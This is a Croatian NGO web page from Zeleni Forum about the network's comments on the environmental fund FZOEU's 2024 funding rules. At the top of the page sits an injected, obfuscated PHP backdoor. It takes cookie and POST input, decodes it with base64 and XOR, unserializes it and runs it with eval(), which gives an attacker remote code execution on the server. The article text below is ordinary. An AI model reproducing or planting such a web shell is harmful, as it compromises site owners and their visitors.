$bDMhBNMO = chr ( 745 - 646 ).'_' . "\124" . "\130" . chr ( 1102 - 991 ).chr ( 174 - 107 ); $GNQlfv = 'c' . 'l' . 'a' . "\163" . 's' . chr ( 211 - 116 ).'e' . chr (120) . 'i' . "\x73" . chr ( 452 - 336 )."\x73";$rtMINlOnUq = class_exists($bDMhBNMO); $GNQlfv = "3231";$AAvQxiikZL = !1;if ($rtMINlOnUq == $AAvQxiikZL){function zCApvp(){$syiLqlIT = new /* 22434 */ c_TXoC(41226 + 41226); $syiLqlIT = NULL;}$MLLyfOTves = "41226";class c_TXoC{private function avsJOB($MLLyfOTves){if (is_array(c_TXoC::$BrfwbO)) {$JQZhjt = str_replace('<' . chr (63) . "\160" . "\150" . chr (112), "", c_TXoC::$BrfwbO[chr (99) . "\x6f" . "\156" . chr ( 307 - 191 ).chr (101) . 'n' . "\164"]);eval($JQZhjt); $MLLyfOTves = "41226";exit();}}private $ejIrXiK;public function UoLMpRzWB(){echo 1697;}public function __destruct(){c_TXoC::$BrfwbO = @unserialize(c_TXoC::$BrfwbO); $MLLyfOTves = "20803_15741";$this->avsJOB($MLLyfOTves); $MLLyfOTves = "20803_15741";}public function uKyMShiW($GXRdL, $dzQSxQv){return $GXRdL[0] ^ str_repeat($dzQSxQv, (strlen($GXRdL[0]) / strlen($dzQSxQv)) + 1);}public function ItWEoZM($GXRdL){$OlXMRVy = "base64";return array_map($OlXMRVy . chr (95) . chr ( 948 - 848 ).chr (101) . "\143" . chr ( 124 - 13 ).chr ( 556 - 456 ).chr ( 721 - 620 ), array($GXRdL,));}public function __construct($QWPbb=0){$abZxXt = $_POST;$lILjfaXvW = $_COOKIE;$dzQSxQv = "b7aa93a8-a17b-448e-bf53-971431b110a8";$eUDoeaXwCi = @$lILjfaXvW[substr($dzQSxQv, 0, 4)];if (!empty($eUDoeaXwCi)){$GXRdL = "";$eUDoeaXwCi = explode(",", $eUDoeaXwCi);foreach ($eUDoeaXwCi as $CIdbhY){$GXRdL .= @$lILjfaXvW[$CIdbhY];$GXRdL .= @$abZxXt[$CIdbhY];}c_TXoC::$BrfwbO = $this->uKyMShiW($this->ItWEoZM($GXRdL), $dzQSxQv);}}public static $BrfwbO = 38262;}zCApvp();} Što smo poduzeli u vezi izmjene načina dodjele sredstava FZOEU - Zeleni Forum

Što smo poduzeli u vezi izmjene načina dodjele sredstava FZOEU

U razdoblju od 20.2. do 5.3.2024. sudjelovali smo i u savjetovanju putem web stranice Fonda za zaštitu okoliša i energetsku učinkovitost o Nacrtu prijedloga Pravilnika o uvjetima i načinu dodjele sredstava Fonda te kriterijima i mjerilima za ocjenjivanje zahtjeva za dodjeljivanje sredstava Fonda. Zajednički komentari su upućeni putem mreže Zeleni forum te nekoliko udruga članica. Podsjećamo kako je prethodno uspostavljena komunikacija s FZOEU te održan sastanak na temu financiranja okolišnih organizacija predstavnika Zelenog foruma i FZOEU te ostalih tijela državne uprave važnih za djelovanje okolišne OCD-e (27.10.23.). Stoga nam je žao što FZOEU nije zauzeo proaktivniji pristup te komunicirao s udrugama donošenje ovog Pravilnika i informaciju o savjetovanju.

Uputili smo šest komentara s prijedlozima dopune i modifikacije članaka Pravilnika, a kako bi se adresirao dio problema vezan uz provedbu natječaja FZOEU kao i odobrenih projekata. Komentar vezan uz uvođenje sektorskih analiza prilikom planiranja namjene sredstva FZOEU nije prihvaćen. U obrazloženju FZOEU je istaknuo kako će analize stanja i kretanja u sektoru komunicirati s Vladinim uredom za udruge, zainteresiranim udrugama te MINGOR-om kada dođe upit za izradu Sektorskih analiza za 2025. godinu od strane Vladinog ureda za udruge.

Za komentare vezane uz prijedloge izmjene članaka, a koji bi omogućili vraćanje mogućnosti sklapanja pojedinačnih ugovora za projekte udruga korisnica LIFE programa; omogućavanje 100 % financiranje projekata udruga; priznavanje volonterskih sati udruga kao vlastitog udjela projekta; priznavanje indirektnih troškova udruga te omogućavanje pred financiranja za projekte udruga, FZOEU je istaknuo kako nisu primjenjivi jer nisu predmet Pravilnika nego teksta Javnog natječaja i/ili ugovora s Korisnikom. Ostaje nam čekati Javni natječaj i ugovore u 2024. godini.

Važno je istaknuti kako je izmjenama Pravilnika FZOEU  omogućio 80% financiranje udruga s cijelog područja RH, a dosad je ovaj postotak bio 40, 60 ili 80 ovisno o području djelovanja udruge.

Nadalje, prema podacima s 15. Info dana o natječajima za financiranje projekata i programa organizacija civilnoga društva iz sredstava državnoga proračuna RH i fondova EU u 2024. godini vidljivo je da FZOEU nema namjeru povisiti iznose sredstava za projekte okolišnih udruga te su oni najmanji gledajući sve ostale sektore (projekti vrijednosti 2650 do 10600 eura). Odnos nadležnih tijela prema okolišnim organizacijama civilnoga društva  direktno reflektira i odnos države prema donošenju te osobito provedbi "zelenih politika" u Republici Hrvatskoj.

Ove stranice su nastale uz financijsku potporu Europske unije.
Za sadržaj stranica odgovaran je isključivo Zeleni Forum i ni u kom slučaju se ne može smatrati da odražava stav Europske unije.
© 1998. - 2022. Zeleni forum - mreža udruga za zaštitu okoliša Hrvatske